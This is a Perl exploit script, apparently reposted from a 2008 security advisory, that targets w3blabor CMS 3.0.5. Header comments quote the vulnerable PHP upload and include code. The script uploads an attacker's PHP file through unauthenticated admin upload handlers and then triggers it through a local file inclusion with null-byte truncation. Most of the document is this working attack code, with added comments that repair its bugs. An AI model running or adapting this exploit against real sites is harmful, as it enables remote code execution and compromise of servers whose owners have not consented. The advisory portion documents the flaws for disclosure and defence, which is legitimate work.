w3blabor CMS 3.0.5 Arbitrary File Upload & LFI Exploit
来源:http://www.w3blaborcms.de 作者:DNX 发布时间:2008-12-08  
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Long;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo8    |
#    --------------------------------------------------
#    |   w3blabor v3.0.5 Arbitrary File Upload & LFI  |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3blaborcms.de
# [!] Detected...: 17.10.2008
# [!] Reported...: 29.11.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: Sicher! Schnell! Einfach!
#                  Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
#                  abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
#                  angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
#                  Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
#                  es zu etwas Besonderem!
#
# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
#
#                  71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
#
#                  80:          $dir = "../../includes/media";
#                  81:          $file = $_FILES['datei']['name'];
#
#                  92:          $file = strtolower($file);
#                  93:
#                  94:          move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
#                  95:          @chmod("".$dir.""/"".$file."", 0777);
#
# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
#
#                  45: $neueslogo = $_FILES['neueslogo']['name'];
#                  46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
#                  47:
#                  48: $endung = substr ($_FILES['neueslogo']['name'], -3);
#                  49:
#                  50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
#
#                  54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
#
# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off; the %00 truncation the exploit relies on additionally needs a PHP version that still accepts a NUL byte in include paths — later releases reject it)
#
#                  43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#                  44:
#                  45: if (file_exists($modulfile)) {
#                  46:
#                  47:         include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#
# [!] Solution...: no update from vendor till now (interim mitigation: block direct requests to admin/inc/*.php, which perform no admin check themselves, and disable script execution in includes/media and includes/upload)
#

# Print the banner and usage text, then quit, unless at least five
# arguments were supplied (host, path, target flag, -f, file — as in
# the example line below).
unless ($ARGV[4])
{
  my @banner = (
    q{                        \#'#/                    },
    q{                        (-.-)                     },
    q{   ----------------oOO---(_)---OOo----------------},
    q{   | w3blabor v3.0.5 Arbitrary File Upload & LFI |},
    q{   |                coded by DNX                 |},
    q{   -----------------------------------------------},
    q{[!] Usage: perl w3blabor.pl [Host] [Path] <Options>},
    q{[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg},
    q{[!] Targets:},
    q{       -1              Upload over media.inc.php},
    q{       -2              Upload over meinlogo.inc.php},
    q{[!] Options:},
    q{[!]    -f [filename]   Path to local file with php code},
    q{       -p [ip:port]    Proxy support},
  );
  # Each line is preceded by a newline, and the block ends with one,
  # exactly as the original sequence of prints did.
  print "\n$_" for @banner;
  print "\n";
  exit;
}

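# Positional arguments: target host (host[:port]) and web path of the
# CMS install (the usage example shows "/w3blabor/").
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $file    = "";
my %options = ();   # file-scoped on purpose: use_bug() reads it

# -1/-2 pick the upload target, -f the local payload, -p a proxy.
# GetOptions returns false on an unknown or malformed option; the
# original ignored that and carried on with a half-parsed set.
unless (GetOptions(\%options, "1", "2", "f=s", "p=s"))
{
  print "[!] Failed, see usage.\n";
  exit;
}

# Without a target there is no request to build, so stop here instead
# of letting use_bug() hand an empty request to LWP.
unless ($options{"1"} || $options{"2"})
{
  print "[!] Failed, see usage.\n";
  exit;
}

if ($options{"f"})
{
  $file = $options{"f"};
  # -f rather than -e: a directory "exists" but cannot be uploaded.
  unless (-f $file)
  {
    print "[!] Failed, local file doesn't exist.\n";
    exit;
  }
}
else
{
  print "[!] Failed, see usage.\n";
  exit;
}

print "[!] Exploiting...\n";

use_bug($host, $path, $file);

print "[!] Exploit done\n";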

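# Upload $file through the selected target and then fetch the URL the
# payload should be reachable at.
#
#   $host  target host (host[:port]), no scheme
#   $path  web path of the CMS install; leading/trailing slashes are
#          added here if missing
#   $file  local file to upload
#
# Reads the file-scoped %options hash: "1"/"2" select the target (as
# in the original, "2" wins if both are set), "p" is an optional proxy.
# Prints the outcome; returns nothing useful.
sub use_bug
{
  my ($host, $path, $file) = @_;

  my $ua = LWP::UserAgent->new();
  $ua->proxy('http', "http://".$options{"p"}) if $options{"p"};

  # URLs are built as http://HOST . PATH . 'admin/...', so PATH must be
  # "/dir/"-shaped. Normalise rather than silently producing
  # "http://hostdir" or "http://host/diradmin/...".
  $path = "/$path" unless $path =~ m{\A/};
  $path .= '/'     unless $path =~ m{/\z};
  my $base = 'http://'.$host.$path;

  # Only the name part is used server-side. The original regex required
  # a directory separator in $file, so a bare "s.jpg" (the usage example)
  # left $filename undefined and the check URL truncated.
  my ($filename) = $file =~ m{([^/\\]*)\z};
  unless (length $filename)
  {
    print "[!] Failed, no file name in '$file'.\n";
    exit;
  }

  my ($req, $url2);

  if ($options{"1"})
  {
    my $url = $base.'admin/inc/media.inc.php?action=upload';
    # media.inc.php lowercases the stored name (vendor line 92 above),
    # so the verification URL has to use the lowercased name as well.
    $url2 = $base.'includes/media/'.lc($filename);
    $req  = POST($url, Content_Type => 'form-data', Content => [ datei => [$file] ]);
  }
  if ($options{"2"})
  {
    # meinlogo.inc.php accepts the file only if its last three characters
    # are jpg/peg/png/gif (vendor line 48-50). The original test
    # (/.*\.jpg|peg|png|gif/) matched those strings anywhere in the path
    # because of alternation precedence; check the suffix instead.
    if ($filename =~ /(?:jpg|peg|png|gif)\z/i)
    {
      my $url = $base.'admin/inc/meinlogo.inc.php?action=upload';
      # %00 cuts off the "/<datei>.inc.php" suffix that modul.inc.php
      # appends; needs magic_quotes_gpc off and a PHP that still accepts
      # a NUL byte in include paths.
      $url2 = $base.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
      $req  = POST($url, Content_Type => 'form-data', Content => [ neueslogo => [$file] ]);
    }
    else
    {
      print "[!] Failed, rename your local file to .jpg\n";
      exit;
    }
  }

  # Neither target flag given: the original passed "" to ->request and
  # died inside LWP.
  unless ($req)
  {
    print "[!] Failed, no target selected (-1 or -2).\n";
    exit;
  }

  # The upload response was ignored before; a 4xx/5xx (or a connection
  # error, which LWP reports as 500) means there is nothing to verify.
  # 3xx is tolerated since the admin page may redirect after the upload.
  my $up = $ua->request($req);
  if ($up->is_error)
  {
    print "[!] Failed, upload request returned ".$up->status_line."\n";
    return;
  }

  my $res = $ua->get($url2);
  if ($res->is_success)
  {
    print "[!] File uploaded\n";
    print "[!] Check your file @ ".$url2."\n";
  }
  else
  {
    print "[!] Failed\n";
  }
}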

 